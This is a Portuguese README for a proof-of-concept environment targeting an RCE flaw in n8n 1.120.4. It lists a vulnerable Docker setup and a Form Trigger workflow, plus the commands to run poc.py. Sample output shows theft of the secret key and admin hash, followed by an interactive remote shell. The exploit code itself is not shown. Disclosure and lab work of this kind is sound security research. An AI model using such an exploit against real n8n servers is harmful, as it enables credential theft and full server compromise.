
Ni8mare, n8n RCE
Ambiente de PoC para n8n 1.120.4 com um fluxo de trabalho de Form Trigger e um script de exploit.
Dockerfile — cria o ambiente vulnerável do n8nrun.bat — executa o contêiner (Windows)workflow.txt — fluxo de trabalho do n8n (inclui Form Trigger)poc.py — script de PoCrequirements.txt — dependências do PoCdocker build -t n8n-vuln:1.120.4 .
run.bat
workflow.txtpip3 install -r requirements.txt
python3 poc.py
FINAL_SECRET_KEY, identificadores de admin) do alvo.n8n-shell>) é fornecido.id) retorna a saída do ambiente alvo (RCE).[+] Success: SECRET_KEY = "..."
[+] Success: admin_id = "..."
[+] Success: admin_hash = "..."
=== n8n Shell Ready ===
n8n-shell> id
[!] 'id' Result:
------------------------------
uid=1000(n8n) gid=1000(n8n) groups=1000(n8n)
------------------------------
Publicamos análises de CVE e malware uma vez por mês. Se tiver interesse, siga os links abaixo para conferir nossas publicações.